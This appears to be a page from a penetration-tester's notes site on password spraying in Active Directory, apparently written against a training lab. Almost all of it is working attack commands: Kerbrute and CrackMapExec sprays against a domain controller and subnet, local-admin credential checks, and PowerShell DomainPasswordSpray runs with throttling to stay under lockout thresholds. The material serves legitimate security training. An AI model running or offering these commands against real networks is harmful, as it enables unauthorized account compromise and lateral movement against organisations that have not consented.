Password Spraying

Password Spraying from Linux

Using Kerbrute

dollarboysushil@kali[dbs]$ kerbrute passwordspray -d marvel.local --dc 192.168.1.1 users_list.txt P@ssw0rd

Using Crackmapexec

dollarboysushil@kali[dbs]$ sudo crackmapexec smb 192.168.1.1 -u users_list.txt -p --continue-on-success

Local Admin Spraying with CrackMapExec

Local admin spraying is a technique used to check if a given set of credentials has local administrator access on multiple machines in a network.

CrackMapExec Local Admin Check
- Command:
  crackmapexec smb {IP-Range} -u {Username} -p {Password} --local-auth
- Description: Checks if the provided username and password have local administrator privileges on the specified IP range. The --local-auth flag specifies that the provided credentials are local accounts on each target machine.
Using a List of Credentials
- Command:
  crackmapexec smb {IP-Range} -u {Usernames-File} -p {Passwords-File} --local-auth
- Description: Uses a file containing multiple usernames and passwords to spray against the specified IP range, checking for local administrator access.
Password Spraying with Known Username
- Command:
  crackmapexec smb {IP-Range} -u {Username} -p {Password-List} --local-auth
- Description: Performs password spraying using a known username and a list of passwords against the IP range to check if any of them provide local administrator access.
Specifying a Domain
- Command:
  crackmapexec smb {IP-Range} -d {Domain-Name} -u {Username} -p {Password} --local-auth
- Description: Checks for local admin access on machines within a specified domain using the provided credentials.
Additional Options
- --continue-on-success: Continue spraying even if successful credentials are found.
- --threads {Number}: Specify the number of threads for concurrent connections.

Example Commands

Basic Local Admin Check:

crackmapexec smb 192.168.1.0/24 -u admin -p Password123 --local-auth

Local Admin Spraying from Windows

Local admin spraying can also be performed on a Windows machine using PowerShell scripts such as DomainPasswordSpray.ps1. This script allows for password spraying across multiple machines within a domain to check for valid credentials.

Using DomainPasswordSpray.ps1
- Step 1: Import the PowerShell module.
  PS C:\htb> Import-Module .\DomainPasswordSpray.ps1
- Step 2: Invoke the password spraying command.
  PS C:\htb> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
- Description: This command sprays the password "Welcome1" across the domain, logging any successful login attempts to the spray_success file. The -ErrorAction SilentlyContinue flag suppresses errors to keep the output clean.
Specifying Additional Parameters
- -UserList {Path}: Use a file containing a list of usernames to spray against.
- -Domain {Domain}: Specify the domain name if different from the default context.
- -Throttle {Milliseconds}: Add a delay between attempts to avoid account lockout policies.
- Example Command:
  PS C:\htb> Invoke-DomainPasswordSpray -UserList C:\users.txt -Password Welcome1 -Domain MYDOMAIN -OutFile spray_success -Throttle 500 -ErrorAction SilentlyContinue

Example Commands

Basic Password Spray:

PS C:\htb> Invoke-DomainPasswordSpray -Password Password123 -OutFile success_log.txt -ErrorAction SilentlyContinue

PreviousGathering Users & Password Policies NextCredentialed Enumeration From Linux

Last updated 1 year ago

Was this helpful?